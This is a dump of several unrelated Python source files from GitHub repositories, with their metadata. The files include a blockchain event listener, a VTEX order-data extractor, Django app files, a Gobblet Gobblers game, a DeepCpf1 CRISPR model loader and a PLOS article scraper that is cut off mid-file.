contract_saturn_mkp.events.mintToken.createFilter(fromBlock='latest')\n\n\n loop = asyncio.get_event_loop()\n try:\n # loop.run_until_complete(asyncio.gather(log_loop(event_doPurchaseBox, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_requestOnChain, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_toOffChain, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_toOnChain, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_doSellNFT, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_doPurchaseNFT, 2)))\n loop.run_until_complete(asyncio.gather(log_loop(event_mintToken, 2)))\n finally:\n loop.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"bezleen/listen-event-mkp","sub_path":"listen_event_mint.py","file_name":"listen_event_mint.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32692055519","text":"import json\nimport requests\nimport csv\n\nprint(\"Enter your cookies: \\n\")\ncookies_input = input()\n\nlines = csv.reader(open('paso2.csv', 'r'), lineterminator='\\n')\n\nurl_transactions = 'https://mcdecflexuat.myvtex.com/api/payments/pvt/admin/transactions/'\nurl_end = '/payments'\ncookies = dict(VtexIdclientAutCookie=cookies_input)\n\nc= csv.writer(open(\"final.csv\", \"w\"), lineterminator='\\n')\n\ni=1\n\nfor line in lines:\n\n orderId = line[0]\n url = line[1]\n sequence = line[2]\n sellerOrderId = line[3]\n hostname = line[4]\n sellersId = line[5]\n status = line[6]\n creationDate_date = line[7]\n creationDate_time = line[8]\n email = line[9]\n firstName = line[10]\n lastName = line[11]\n document = line[12]\n transactionId = line[13]\n payments_Id = line[14]\n payments_paymentSystemName = line[15]\n payments_group = line[16]\n payments_value = line[17]\n payments_installments = line[18]\n payments_referenceValue = line[19]\n payments_lastDigits = line[20]\n payments_connectorResponses_Tid = line[21]\n payments_connectorResponses_ReturnCode = line[22]\n payments_connectorResponses_acquirer = line[23]\n payments_connectorResponses_message = line[24]\n\n if line[24]==\"null\":\n new_url = url_transactions + transactionId + url_end\n r = requests.get(new_url, cookies=cookies).json()\n try: \n length = int(len(r[0]['fields']))\n position = length - 1\n value = r[0]['fields'][position]['value']\n value_json = json.loads(value)\n payments_connectorResponses_message = value_json['message']\n except:\n payments_connectorResponses_message = \"API ERROR: \"+ str(r)\n \n c.writerow([\n\t\torderId,\n url,\n\t\tsequence,\n\t\tsellerOrderId,\n\t\thostname,\n\t\tsellersId,\n\t\tstatus,\n\t\tcreationDate_date,\n\t\tcreationDate_time,\n\t\temail,\n\t\tfirstName,\n\t\tlastName,\n\t\tdocument,\n\t\ttransactionId,\n\t\tpayments_Id,\n\t\tpayments_paymentSystemName,\n\t\tpayments_group,\n\t\tpayments_value,\n\t\tpayments_installments,\n\t\tpayments_referenceValue,\n payments_lastDigits,\n\t\tpayments_connectorResponses_Tid,\n\t\tpayments_connectorResponses_ReturnCode,\n\t\tpayments_connectorResponses_acquirer,\n\t\tpayments_connectorResponses_message\n ])\n\n print(str(i)+\"/2615\")\n print(\"\\n\")\n i+=1","repo_name":"lucasdellasala/vtex-order-extractor","sub_path":"paso3.py","file_name":"paso3.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17337419916","text":"from Euler.Solution import Solution\nimport Euler.Math as EM\n\ndef logic():\n factorial = 1\n for i in range(1, 100 + 1): factorial *= i\n else:\n summed = str(factorial)\n return sum(map(int, summed))\n\nsolution = Solution(value = 648, placement = None)\nsolution.logic = logic\nsolution.run()\n","repo_name":"Parad0x13/ProjectEuler","sub_path":"Solutions/0020_Solved.py","file_name":"0020_Solved.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1964174723","text":"import modi_plus\nfrom playscii import GameManager, GameObject\nfrom math import sin, radians\n\n\nclass BrushManager(GameManager):\n def __init__(self, size, imu, button):\n super().__init__(size)\n self.cursor = Brush(pos=(size[0] // 2, size[1] // 2), render=\"o\")\n self.imu = imu\n self.button = button\n\n def setup(self):\n self.add_object(self.cursor)\n\n def update(self):\n h, w = self.height // 2, self.width // 2\n self.cursor.y = h - h * sin(radians(-self.imu.roll))\n self.cursor.x = w - w * sin(radians(-self.imu.pitch))\n if self.button.pressed:\n self.add_object(Brush((self.cursor.x, self.cursor.y), \"x\"))\n\n\nclass Brush(GameObject):\n def update(self):\n pass\n\n\nif __name__ == \"__main__\":\n bundle = modi_plus.MODIPlus()\n canvas = BrushManager((100, 20), bundle.imus[0], bundle.buttons[0])\n canvas.start()\n","repo_name":"LUXROBO/pymodi-plus","sub_path":"examples/creation_examples/brush.py","file_name":"brush.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72084933287","text":"#!/usr/bin/python3\n\nimport requests\n\ndef get_location(ip_address):\n response = requests.get(f'https://ipapi.co/{ip_address}/json/')\n data = response.json()\n return data\n\n# Get your public IP address\nip = requests.get('https://api.ipify.org').text\n\n# Get location information based on IP address\nlocation_data = get_location(ip)\n\n# Extract relevant information\ncity = location_data['city']\nregion = location_data['region']\ncountry = location_data['country_name']\n\n# Print location information\nprint(\"Your location:\")\nprint(\"City:\", city)\nprint(\"Region:\", region)\nprint(\"Country:\", country)\n","repo_name":"mohamedashraf56/Embedded-Linux-Tasks","sub_path":"1-Python/Session 3/my location.py","file_name":"my location.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9166227436","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('attendance', '0006_regularofficetime_remarks'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='regularofficetime',\n name='entry_category',\n field=models.CharField(max_length=40, default=1, choices=[('1', 'Regular'), ('2', 'Execption')]),\n preserve_default=False,\n ),\n ]\n","repo_name":"tifat58/hrmis","sub_path":"attendance/migrations/0007_regularofficetime_entry_category.py","file_name":"0007_regularofficetime_entry_category.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15565441486","text":"import urllib2\n\nfrom connector import Connector\n\nif __name__ == '__main__':\n domain = 'ftp.freebsd.org'\n path = '/pub/FreeBSD/'\n protocol = input('Connecting to {}. Which Protocol to use? (0-http, 1-ftp):'.format(domain))\n\n connection = Connector(protocol)\n try:\n content = connection.read(domain, path)\n except urllib2.URLError as e:\n print('Can not access resource with this method')\n else:\n print(connection.parse(content))\n","repo_name":"huyngopt1994/Common_pattern_python","sub_path":"AbstractFactory/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19487181838","text":"import tkinter as tk\n\nfrom Link_Line import Link_Line\n\nclass DragDropMixin:\n def __init__(self, parent, links):\n self.parent = parent\n self.links = links\n self.bind(\"\", self.on_start)\n self.bind(\"\", self.on_drag)\n self.bind(\"\", self.on_release)\n \n def on_start(self, event):\n widget = event.widget\n widget.startX = event.x\n widget.startY = event.y\n if len(self.links) > 0:\n for link in self.links:\n if self is link.start:\n end_x, end_y = link.end.get_coordinates()\n self.parent.coords(link.value, self.winfo_x()+50, self.winfo_y()+50, end_x+50, end_y+50)\n if self is link.end:\n start_x, start_y = link.start.get_coordinates()\n self.parent.coords(link.value, start_x+50, start_y+50, self.winfo_x()+50, self.winfo_y()+50)\n \n def on_drag(self, event):\n widget = event.widget\n x = widget.winfo_x() - widget.startX + event.x\n y = widget.winfo_y() - widget.startY + event.y\n widget.place(x=x, y=y)\n if len(self.links) > 0:\n for link in self.links:\n if self is link.start:\n end_x, end_y = link.end.get_coordinates()\n self.parent.coords(link.value, self.winfo_x()+50, self.winfo_y()+50, end_x+50, end_y+50)\n if self is link.end:\n start_x, start_y = link.start.get_coordinates()\n self.parent.coords(link.value, start_x+50, start_y+50, self.winfo_x()+50, self.winfo_y()+50)\n\n def on_release(self, event):\n widget = event.widget\n x = self.winfo_x()\n y =self.winfo_y()\n \n\nclass Node_Frame(DragDropMixin, tk.Frame):\n def __init__(self, parent, node, image_path, node_name, links = []):\n self.parent = parent\n self.links = links\n self.node = node\n tk.Frame.__init__(self, self.parent)\n super().__init__(self.parent, self.links)\n self.label = tk.Label(self, text=node_name, font=(\"Helvetica\", 12))\n self.canvas = tk.Canvas(self, width=100, height=100, bd=0, highlightthickness=0)\n self.canvas.pack()\n image = tk.PhotoImage(file=image_path)\n self.image = image\n #place the image in the center of the canvas\n self.canvas.create_image(50, 50, image=image)\n self.label.pack()\n self.pack()\n\n def get_coordinates(self):\n return self.winfo_x(), self.winfo_y()\n\n","repo_name":"AlecMParfitt/net_sim","sub_path":"Node_Frame.py","file_name":"Node_Frame.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"171838477","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.sitemaps.views import sitemap\nfrom blog.sitemaps import StaticViewSitemap, BlogSitemap\n\nsitemaps = {\n 'static': StaticViewSitemap,\n 'blog' : BlogSitemap,\n}\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^markdown/', include(\"django_markdown.urls\")),\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n \tname='django.contrib.sitemaps.views.sitemap'),\n url(r'', include('blog.urls')),\n]\n","repo_name":"jyotman/personal-blog","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27265967754","text":"# coding: utf8\n\nfrom pyrevit import revit, UI, DB\nfrom pyrevit import script, forms\nimport rpw\nimport time\nfrom Autodesk.Revit.DB import Transaction\n\nstart = time.time()\n\n\n__title__ = \"0.31 Wert_Schreiben_Raum\"\n__doc__ = \"\"\"Wert Schreiben\"\"\"\n__author__ = \"Menghui Zhang\"\n\nlogger = script.get_logger()\noutput = script.get_output()\n\nuidoc = rpw.revit.uidoc\ndoc = rpw.revit.doc\n\nfrom pyIGF_logInfo import getlog\ngetlog(__title__)\n\n\n# MEP Räume aus aktueller Projekt\nspaces_collector = DB.FilteredElementCollector(doc) \\\n .OfCategory(DB.BuiltInCategory.OST_MEPSpaces)\nspaces = spaces_collector.ToElementIds()\n\nlogger.info(\"{} MEP Räume ausgewählt\".format(len(spaces)))\n\nPara = rpw.ui.forms.TextInput('Parameter: ', default = \"Parameter\")\n\ndef get_value(param):\n \"\"\"Konvertiert Einheiten von internen Revit Einheiten in Projekteinheiten\"\"\"\n\n value = revit.query.get_param_value(param)\n\n try:\n unit = param.DisplayUnitType\n\n value = DB.UnitUtils.ConvertFromInternalUnits(\n value,\n unit)\n\n except Exception as e:\n pass\n\n return value\n\ntable = []\nwhile Para != 'Parameter':\n\n t = Transaction(doc, 'Übertragen')\n t.Start()\n\n\n Wert = rpw.ui.forms.TextInput('Wert: ', default = \"Wert\")\n\n for Space in spaces_collector:\n name = get_value(Space.LookupParameter('Name'))\n nummer = get_value(Space.LookupParameter('Nummer'))\n para = Space.LookupParameter(Para)\n para.SetValueString(str(Wert))\n\n t.Commit()\n\n\n\n Para = rpw.ui.forms.TextInput('Parameter: ', default = \"Parameter\")\n\n\ntotal = time.time() - start\nlogger.info(\"total time: {} {}\".format(total, 100 * \"_\"))\n","repo_name":"MenghuiZhang/pyIGF","sub_path":"pyIGF.tab/Allgemein.panel/All_1.stack/Parameter.pulldown/alt/Werte schreiben.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74516051686","text":"class _player:\n def __init__(self, player, gobbs, color, scolor, modes):\n self.player = player\n self.gobbs = gobbs\n self.color = color\n self.scolor = scolor\n self.modes = modes\n\n \n_win_lines = {\n \"a\": ['a1', 'a2', 'a3'],\n \"b\": ['b1', 'b2', 'b3'],\n \"c\": ['c1', 'c2', 'c3'],\n \"one\": ['a1', 'b1', 'c1'],\n \"two\": ['a2', 'b2', 'c2'],\n \"three\": ['a3', 'b3', 'c3'],\n \"backslash\": ['a1', 'b2', 'c3'],\n \"slash\": ['a3', 'b2', 'c1']\n}\n\n\n# GobbletGobblers('佐藤', '田中', 'red', ' ')\nclass GobbletGobblers:\n def __init__(self, senkou_player, koukou_player, empty_board_text):\n\n self.empty_board_text = str(empty_board_text)\n self.sen = _player(senkou_player, list('ssmmbb'), 'Red', 'r', ['p'])\n self.kou = _player(koukou_player, list('ssmmbb'), 'Blue', 'b', ['p'])\n\n self.turn = 1\n\n self.now_player = self.sen\n\n self.won = False\n self.winner = None\n\n self.board = {\n \"a1\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"a2\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"a3\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"b1\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"b2\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"b3\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"c1\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"c2\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"c3\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n }\n }\n\n def _win_check(self):\n for key in _win_lines.keys():\n if all([self.board[_key]['t'].startswith('b') for _key in _win_lines[key]]):\n self.won = True\n self.kou.win_line = key\n self.winner = self.kou\n return\n if all([self.board[_key]['t'].startswith('r') for _key in _win_lines[key]]):\n self.won = True\n self.sen.win_line = key\n self.winner = self.sen\n return\n\n def _powerful(self, place):\n gobbs = list(dict.fromkeys(self.now_player.gobbs))\n board_place = self.board[place]\n\n if board_place['t'] == self.empty_board_text:\n return gobbs\n\n elif board_place['t'].endswith('s'):\n try:\n gobbs.remove('s')\n except:\n pass\n return gobbs\n\n elif board_place['t'].endswith('m'):\n try:\n gobbs.remove('s')\n except:\n pass\n try:\n gobbs.remove('m')\n except:\n pass\n return gobbs\n\n def choices_put(self):\n not_big_places = [key for key in self.board.keys() if self.board[key]['b'] is None]\n a1 = None if 'a1' not in not_big_places else self._powerful('a1')\n a2 = None if 'a2' not in not_big_places else self._powerful('a2')\n a3 = None if 'a3' not in not_big_places else self._powerful('a3')\n b1 = None if 'b1' not in not_big_places else self._powerful('b1')\n b2 = None if 'b2' not in not_big_places else self._powerful('b2')\n b3 = None if 'b3' not in not_big_places else self._powerful('b3')\n c1 = None if 'c1' not in not_big_places else self._powerful('c1')\n c2 = None if 'c2' not in not_big_places else self._powerful('c2')\n c3 = None if 'c3' not in not_big_places else self._powerful('c3')\n\n r = {\n \"a1\": a1,\n \"a2\": a2,\n \"a3\": a3,\n \"b1\": b1,\n \"b2\": b2,\n \"b3\": b3,\n \"c1\": c1,\n \"c2\": c2,\n \"c3\": c3\n }\n return r\n\n def put(self, place, size):\n self.board[place][size] = self.now_player.scolor\n self.board[place]['t'] = self.now_player.scolor + size\n self._win_check()\n self.now_player.gobbs.remove(size)\n\n if self.now_player.scolor == 'r':\n self.sen = self.now_player\n else:\n self.kou = self.now_player\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('b')]\n if len(players_gobbs) > 0 and 'm' not in self.kou.modes:\n self.kou.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.kou.modes:\n self.kou.modes.remove('m')\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('r')]\n if len(players_gobbs) > 0 and 'm' not in self.sen.modes:\n self.sen.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.sen.modes:\n self.sen.modes.remove('m')\n\n self.now_player = self.kou if self.now_player.scolor == 'r' else self.sen\n\n if not self.won:\n self.turn += 1\n\n def choices_move_from(self):\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith(self.now_player.scolor)]\n return players_gobbs\n\n def choices_move_to(self, from_):\n not_big_places = [key for key in self.board.keys() if self.board[key]['b'] is None]\n if self.board[from_]['t'].endswith('s'):\n return [key for key in not_big_places if self.board[key]['t'] == self.empty_board_text]\n elif self.board[from_]['t'].endswith('m'):\n return [key for key in not_big_places if self.board[key]['m'] is None and self.board[key]['b'] is None]\n elif self.board[from_]['t'].endswith('b'):\n return not_big_places\n\n def move(self, from_, to):\n move_gobb = self.board[from_]['t']\n if move_gobb.endswith('s'):\n self.board[from_]['s'] = None\n self.board[from_]['t'] = self.empty_board_text\n \n self._win_check()\n \n elif move_gobb.endswith('m'):\n self.board[from_]['m'] = None\n self.board[from_]['t'] = self.board[from_]['s'] + 's' if not self.board[from_]['s'] is None else self.empty_board_text\n \n self._win_check()\n \n elif move_gobb.endswith('b'):\n self.board[from_]['b'] = None\n if not self.board[from_]['m'] is None:\n self.board[from_]['t'] = self.board[from_]['m'] + 'm'\n elif not self.board[from_]['s'] is None:\n self.board[from_]['t'] = self.board[from_]['s'] + 's'\n else:\n self.board[from_]['t'] = self.empty_board_text\n \n self._win_check()\n \n self.board[to]['b'] = move_gobb[0]\n self.board[to]['t'] = move_gobb\n if not self.won:\n self._win_check()\n \n if self.now_player.scolor == 'r':\n self.sen = self.now_player\n else:\n self.kou = self.now_player\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('b')]\n if len(players_gobbs) > 0 and 'm' not in self.kou.modes:\n self.kou.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.kou.modes:\n self.kou.modes.remove('m')\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('r')]\n if len(players_gobbs) > 0 and 'm' not in self.sen.modes:\n self.sen.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.sen.modes:\n self.sen.modes.remove('m')\n\n self.now_player = self.kou if self.now_player.scolor == 'r' else self.sen\n\n if not self.won:\n self.turn += 1\n","repo_name":"AomiVel/gobbletgobblers.py","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":8444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7577976066","text":"from django.shortcuts import render, redirect\nfrom .models import Favorite, Contactame\nfrom django.contrib import messages\n\n# Create your views here.\ndef Home(request):\n favorite = Favorite.objects.all().filter(is_available=True) \n \n return render(request, 'pages/home.html', {\n 'favorite': favorite,\n })\n\n\ndef register_contact(request):\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n \n contact = Contactame.objects.create(name=name, email=email, phone=phone, message=message)\n \n messages.success(request, message=\"Me has contactado con exito!!! Te respondere a la brevedad. 😃\")\n \n return redirect('/')","repo_name":"JsArmandoCano/BunnyDesignPython","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17991036009","text":"# import madmom\r\n# # from madmom import madmom\r\n#\r\n# def rnn_beattrack(sound, sr):\r\n# # approach 2 - dbn tracker\r\n# proc = madmom.features.beats.DBNBeatTrackingProcessor(fps=100)\r\n# act = madmom.features.beats.RNNBeatProcessor()\r\n#\r\n# beat_times = proc(act)\r\n#\r\n# clicks = librosa.clicks(beat_times, sr=sr, length=len(sound))\r\n# # ipd.Audio(x + clicks, rate=sr\r\n# print(type(sound+clicks))\r\n\r\nimport librosa\r\nimport numpy as np\r\nimport sys\r\nimport scipy.signal\r\nimport matplotlib.pyplot as plt\r\n\r\ndef beat_track_dynamic(sound, sr):\r\n tempo, beat_times = librosa.beat.beat_track(sound, sr=sr, start_bpm=60, units='time')\r\n clicks = librosa.clicks(beat_times, sr=sr, length=len(sound))\r\n\r\n return sound+clicks, clicks\r\n\r\ndef plot_beats(clicks):\r\n plt.figure(figsize=(14, 5))\r\n # librosa.display.waveplot(x, alpha=0.6)\r\n plt.vlines(clicks, -1, 1, color='r')\r\n plt.ylim(-1, 1)\r\n plt.show()\r\n\r\ndef find_beats_start(clicks):\r\n clicks_indicies = scipy.signal.find_peaks(clicks)\r\n return clicks_indicies[0]\r\n\r\n\r\ndef overlay_beat_songs(song1, song2, ind1, ind2, sr=22050):\r\n if ind1 > ind2:\r\n diff = ind1 - ind2\r\n adjusted_song2 = np.concatenate([np.array([0]*diff), song2])\r\n return song1, adjusted_song2\r\n else:\r\n diff = ind2 - ind1\r\n adjusted_song1 = np.concatenate([np.array([0]*diff), song1])\r\n return adjusted_song1, song2\r\n\r\n\r\n","repo_name":"alexandrova-s/app_mashups","sub_path":"beat_tracker.py","file_name":"beat_tracker.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34910008902","text":"import numpy as np\nimport sys; \n\nfrom tensorflow.keras import backend as K\n\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import ( \n Input,\n Multiply,\n Dense,\n Dropout,\n Activation,\n Flatten,\n Convolution1D,\n AveragePooling1D\n)\n\ndef build_models():\n Seq_deepCpf1_Input_SEQ = Input(shape=(34,4))\n Seq_deepCpf1_C1 = Convolution1D(80, 5, activation='relu')(Seq_deepCpf1_Input_SEQ)\n Seq_deepCpf1_P1 = AveragePooling1D(2)(Seq_deepCpf1_C1)\n Seq_deepCpf1_F = Flatten()(Seq_deepCpf1_P1)\n Seq_deepCpf1_DO1= Dropout(0.3)(Seq_deepCpf1_F)\n Seq_deepCpf1_D1 = Dense(80, activation='relu')(Seq_deepCpf1_DO1)\n Seq_deepCpf1_DO2= Dropout(0.3)(Seq_deepCpf1_D1)\n Seq_deepCpf1_D2 = Dense(40, activation='relu')(Seq_deepCpf1_DO2)\n Seq_deepCpf1_DO3= Dropout(0.3)(Seq_deepCpf1_D2)\n Seq_deepCpf1_D3 = Dense(40, activation='relu')(Seq_deepCpf1_DO3)\n Seq_deepCpf1_DO4= Dropout(0.3)(Seq_deepCpf1_D3)\n Seq_deepCpf1_Output = Dense(1, activation='linear')(Seq_deepCpf1_DO4)\n Seq_deepCpf1 = Model(inputs=[Seq_deepCpf1_Input_SEQ], outputs=[Seq_deepCpf1_Output])\n \n DeepCpf1_Input_SEQ = Input(shape=(34,4))\n DeepCpf1_C1 = Convolution1D(80, 5, activation='relu')(DeepCpf1_Input_SEQ)\n DeepCpf1_P1 = AveragePooling1D(2)(DeepCpf1_C1)\n DeepCpf1_F = Flatten()(DeepCpf1_P1)\n DeepCpf1_DO1= Dropout(0.3)(DeepCpf1_F)\n DeepCpf1_D1 = Dense(80, activation='relu')(DeepCpf1_DO1)\n DeepCpf1_DO2= Dropout(0.3)(DeepCpf1_D1)\n DeepCpf1_D2 = Dense(40, activation='relu')(DeepCpf1_DO2)\n DeepCpf1_DO3= Dropout(0.3)(DeepCpf1_D2)\n DeepCpf1_D3_SEQ = Dense(40, activation='relu')(DeepCpf1_DO3)\n \n DeepCpf1_Input_CA = Input(shape=(1,))\n DeepCpf1_D3_CA = Dense(40, activation='relu')(DeepCpf1_Input_CA)\n DeepCpf1_M = Multiply()([DeepCpf1_D3_SEQ, DeepCpf1_D3_CA])\n \n DeepCpf1_DO4= Dropout(0.3)(DeepCpf1_M)\n DeepCpf1_Output = Dense(1, activation='linear')(DeepCpf1_DO4)\n DeepCpf1 = Model(inputs=[DeepCpf1_Input_SEQ, DeepCpf1_Input_CA], outputs=[DeepCpf1_Output])\n \n Seq_deepCpf1.load_weights('weights/Seq_deepCpf1_weights.h5')\n DeepCpf1.load_weights('weights/DeepCpf1_weights.h5')\n \n return Seq_deepCpf1, DeepCpf1\n\n\ndef run_on_seq(sequences, chromatin_acessibilities=None):\n if chromatin_acessibilities is None:\n chromatin_acessibilities = [0 for _ in sequences]\n\n Seq_deepCpf1, DeepCpf1 = build_models()\n\n SEQ, CA = PREPROCESS(sequences, chromatin_acessibilities)\n \n Seq_deepCpf1_SCORE = Seq_deepCpf1.predict([SEQ], batch_size=50, verbose=0)\n DeepCpf1_SCORE = DeepCpf1.predict([SEQ, CA], batch_size=50, verbose=0) * 3\n\n\n return Seq_deepCpf1_SCORE, DeepCpf1_SCORE\n\n\ndef PREPROCESS(sequences, chromatin_acessibilities):\n data_n = len(sequences) - 1\n SEQ = np.zeros((data_n + 1, 34, 4), dtype=int)\n CA = np.zeros((data_n + 1, 1), dtype=int)\n\n \n for j, (seq, ca) in enumerate(zip(sequences, chromatin_acessibilities)):\n for i in range(34):\n if seq[i] in \"Aa\":\n SEQ[j, i, 0] = 1\n elif seq[i] in \"Cc\":\n SEQ[j, i, 1] = 1\n elif seq[i] in \"Gg\":\n SEQ[j, i, 2] = 1\n elif seq[i] in \"Tt\":\n SEQ[j, i, 3] = 1\n\n CA[j,0] = ca*100\n\n return SEQ, CA\n\n","repo_name":"albinoknyaz/YourCRISPRguide","sub_path":"DeepCpf1.py","file_name":"DeepCpf1.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31527810026","text":"import pytest\n\nfrom geoprofielen.objects.cpt import CPT\n\ndef test_read():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt.gef\")\n \n assert(cpt.name == \"DKM-227\")\n assert(cpt.x == 139081.7)\n assert(cpt.y == 446328.1)\n assert(cpt.z_top == 0.73)\n assert(cpt.z_min == -14.48)\n\n\ndef test_filter():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt.gef\")\n\n layers = cpt.filter(0.2)\n assert(layers.shape == (76, 6))\n\n layers = cpt.filter(0.1)\n assert(layers.shape == (153, 6))\n\ndef test_plot():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt.gef\")\n cpt.convert()\n cpt.plot(filepath=\"./tests/testdata/out\")\n\ndef test_pre_excavated_depth():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt_preexcavated_depth.gef\")\n assert cpt.pre_excavated_depth == 2.0\n","repo_name":"breinbaas/geoprofielen","sub_path":"tests/test_cpt.py","file_name":"test_cpt.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38274190188","text":"from bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\nfrom .base import Retriever, Meta, ArticleLink\nimport time \n\n'''\n#loop = asyncio.new_event_loop()\n#asyncio.set_event_loop(loop)\n\nif asyncio.get_event_loop().is_running(): # Only patch if needed (i.e. running in Notebook, Spyder, etc)\n import nest_asyncio\n nest_asyncio.apply()\nloop = asyncio.get_running_loop()\nasession = AsyncHTMLSession(loop=loop)\n'''\n\nsession = HTMLSession()\nURL = {'base':\"https://journals.plos.org\",\n 'search':\"https://journals.plos.org/plosone/search?q={}&page=1\",\n }\n\nclass PLOS(Retriever):\n\n def __init__(self) -> None:\n super().__init__(journal='plos', base_url=URL['base'], search_url=URL['search'])\n self.num_pages = 1\n self.meta = {\n 'author':'citation_author', \n 'citation_date':'citation_date',\n 'publication_date':'citation_date', \n 'doi':'citation_doi',\n 'publisher':'citation_publisher', \n 'journal':'citation_journal_title', \n 'article_type':'citation_article_type'}\n\n def get_num_pages(self, page_soup):\n nav = page_soup.find('nav',{'id':'article-pagination'})\n links = nav.find_all('a')\n if len(links) >= 2:\n self.num_pages = int(links[-2].text)\n \n def get_page_links(self, page_soup):\n article_links = []\n articles = page_soup.find_all('dt')\n for article in articles:\n doi = article.get('data-doi')\n link = article.find('a')\n uri = link.get('href')\n article_links.append(ArticleLink(title=link.text, url=self.base_url+uri, doi=doi))\n return article_links\n \n '''\n async def _asearch(self, query)->BeautifulSoup:\n self.query_url = self.get_query_url(query)\n r = await asession.get(self.query_url)\n await r.html.arender() \n time.sleep(1)\n return BeautifulSoup(r.html.html, \"lxml\")\n\n def _search(self, query)->BeautifulSoup:\n return asyncio.run(self._asearch(query))\n '''\n \n def _search(self, query)->BeautifulSoup:\n self.query_url = self.get_query_url(query)\n res = session.get(self.query_url)\n res.html.render(wait=1,sleep=1)\n html = res.html.html\n soup = BeautifulSoup(html, \"lxml\")\n return soup\n\n def get_meta(self, page_soup)->Meta:\n data = {}\n for k,v in self.meta.items():\n els = page_soup.find_all('meta',{'name':v})\n els = [el.get('content') for el in els]\n if len(els)==1:\n data.update({k:els[0]})\n else:\n data.update({k:els})\n\n # Add PDF\n try:\n link = page_soup.find('a',{'id':\"downloadPdf\"})\n data.update({'pdf':self.base_url+link.get('href')})\n except:\n print('Could not find PDF')\n\n # Add link\n link = page_soup.find('meta',{'property':'og:url'})\n data.update({'link':link.get('content')})\n return Meta(**data)\n\n def get_sections(self, soup, level=0):\n sections = soup.find_all(self.levels[level])\n if len(sections)==0 and level<4:\n return self.get_sections(soup, level+1)\n if len(sections)==0:\n return None\n if level==4:\n return [s.text for s in sections if 